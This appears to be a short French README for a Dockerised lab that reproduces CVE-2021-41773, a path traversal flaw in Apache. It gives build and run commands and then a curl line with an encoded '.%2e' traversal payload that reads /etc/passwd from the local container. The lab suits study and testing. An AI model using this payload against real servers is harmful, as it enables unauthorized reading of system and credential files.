
Exploit PoC pour CVE-2021-41773 avec configuration Docker.
Placez-vous dans le répertoire contenant la configuration Apache et le Dockerfile (fournis dans le dépôt).
Construction de l'image : ~# docker build -t cve-2021-41773:1.0 .
Exécution de l'image Docker : ~# docker run --rm -d -p 4444:80 cve-2021-41773:1.0 (Remarque : vous pouvez également utiliser l'ID de l'image au lieu du nom de l'image ; trouvez les détails de l'image avec la commande 'docker images')
Test du service : ~# curl localhost:4444
Exploitation du service : ~# curl localhost:4444/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd